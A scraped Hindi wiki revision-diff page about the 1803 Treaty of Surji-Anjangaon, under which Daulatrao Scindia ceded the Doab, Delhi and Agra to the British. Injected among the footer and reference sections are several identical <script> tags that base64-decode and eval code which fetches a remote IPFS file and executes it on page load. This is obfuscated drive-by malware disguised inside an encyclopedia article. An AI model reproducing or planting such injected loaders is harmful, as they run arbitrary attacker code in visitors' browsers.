Difference between revisions of "सुर्जी अर्जुनगाँव की सन्धि"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:औपनिवेशिक काल (को हटा दिया गया हैं।))
 
(10 intermediate revisions by 3 users not shown)
Line 1: Line 1:
'''सुर्जी अर्जुनगाँव की सन्धि''', 1803 ई. में [[अंग्रेज़|अंग्रेज़ों]] और [[दौलतराव शिन्दे]] के बीच हुई थी, जिसके फलस्वरूप दोनों के बीच चलने वाला युद्ध समाप्त हो गया। सन्धि के अनुसार शिन्दे ने अपने दरबार में ब्रिटिश रेजीडेन्ट रखना स्वीकार कर लिया, [[बसई की सन्धि]] को स्वीकार किया, निज़ाम के ऊपर अपने सारे दावे त्याग दिए और अंग्रेज़ों की सहमति के बिना अपनी नौकरी में किसी भी विदेशी को न रखने का वचन दिया। इसके अलावा उसने [[गंगा नदी|गंगा]] और [[यमुना नदी|यमुना]] के बीच का सारा दोआब, जिसमें [[दिल्ली]] और [[आगरा]] भी सम्मिलित था, अंग्रेज़ों को सौंप दिया। इस प्रकार उत्तरी [[भारत]], दक्षिण तथा [[गुजरात]] में दौलतराव शिन्दे के समस्त राज्य पर अंग्रेज़ों का प्रभुत्व स्थापित हो गया। शिन्दे ने [[राजपूताना]] के अधिकांश राज्यों की राजनीति में भी कोई हस्तक्षेप न करने का वचन दिया। इस प्रकार अर्जुन गाँव की सन्धि के द्वारा शिन्दे की स्वतंत्रता समाप्त हो गई तथा उत्तरी भारत के अधिकांश भाग में [[ब्रिटिश साम्राज्य]] की स्थापना साकार हुई।  
+
*'''सुर्जी अर्जुनगाँव की सन्धि''', 1803 ई. में [[अंग्रेज़|अंग्रेज़ों]] और [[दौलतराव शिन्दे]] के बीच हुई थी।
 +
*इस सन्धि के फलस्वरूप दोनों के बीच चलने वाला युद्ध समाप्त हो गया।
 +
*सन्धि के अनुसार शिन्दे ने अपने दरबार में ब्रिटिश रेजीडेन्ट रखना स्वीकार कर लिया और [[बसई की सन्धि]] को स्वीकार किया।
 +
*शिन्दे ने निज़ाम के ऊपर अपने सारे दावे त्याग दिए और अंग्रेज़ों की सहमति के बिना अपनी नौकरी में किसी भी विदेशी को न रखने का वचन दिया।
 +
*इसके अलावा उसने [[गंगा नदी|गंगा]] और [[यमुना नदी|यमुना]] के बीच का सारा [[दोआब]], जिसमें [[दिल्ली]] और [[आगरा]] भी सम्मिलित था, अंग्रेज़ों को सौंप दिए।
 +
*इस प्रकार [[उत्तरी भारत]], दक्षिण तथा [[गुजरात]] में दौलतराव शिन्दे के समस्त राज्य पर अंग्रेज़ों का प्रभुत्व स्थापित हो गया।
 +
*शिन्दे ने [[राजपूताना]] के अधिकांश राज्यों की राजनीति में भी कोई हस्तक्षेप न करने का वचन दिया।
 +
*अर्जुनगाँव की सन्धि के द्वारा शिन्दे की स्वतंत्रता समाप्त हो गई तथा उत्तरी भारत के अधिकांश भाग में [[ब्रिटिश साम्राज्य]] की स्थापना साकार हुई।
  
 
{{प्रचार}}
 
{{प्रचार}}
Line 9: Line 16:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
*(पुस्तक 'भारतीय इतिहास कोश') पृष्ठ संख्या-481
+
{{cite book | last = भट्टाचार्य| first = सच्चिदानन्द | title = भारतीय इतिहास कोश | edition = द्वितीय संस्करण-1989| publisher = उत्तर प्रदेश हिन्दी संस्थान| location =  भारत डिस्कवरी पुस्तकालय| language =  हिन्दी| pages = 481 | chapter =}}
 
<references/>
 
<references/>
 +
==संबंधित लेख==
 +
{{युद्ध सन्धियाँ}}
 +
{{औपनिवेशिक काल}}
 
[[Category:इतिहास कोश]]
 
[[Category:इतिहास कोश]]
[[Category:मराठा साम्राज्य]]
+
[[Category:मराठा साम्राज्य]][[Category:जाट-मराठा काल]]
 
[[Category:औपनिवेशिक काल]]
 
[[Category:औपनिवेशिक काल]]
 
__INDEX__
 
__INDEX__

Latest revision as of 11:44, 23 April 2012

  • surji arjunagaanv ki sandhi, 1803 ee. mean aangrezoan aur daulatarav shinde ke bich huee thi.
  • is sandhi ke phalasvaroop donoan ke bich chalane vala yuddh samapt ho gaya.
  • sandhi ke anusar shinde ne apane darabar mean british rejident rakhana svikar kar liya aur basee ki sandhi ko svikar kiya.
  • shinde ne nizam ke oopar apane sare dave tyag die aur aangrezoan ki sahamati ke bina apani naukari mean kisi bhi videshi ko n rakhane ka vachan diya.
  • isake alava usane ganga aur yamuna ke bich ka sara doab, jisamean dilli aur agara bhi sammilit tha, aangrezoan ko sauanp die.
  • is prakar uttari bharat, dakshin tatha gujarat mean daulatarav shinde ke samast rajy par aangrezoan ka prabhutv sthapit ho gaya.
  • shinde ne rajapootana ke adhikaansh rajyoan ki rajaniti mean bhi koee hastakshep n karane ka vachan diya.
  • arjunagaanv ki sandhi ke dvara shinde ki svatantrata samapt ho gee tatha uttari bharat ke adhikaansh bhag mean british samrajy ki sthapana sakar huee.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bhattachary, sachchidanand bharatiy itihas kosh, dvitiy sanskaran-1989 (hindi), bharat diskavari pustakalay: uttar pradesh hindi sansthan, 481.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>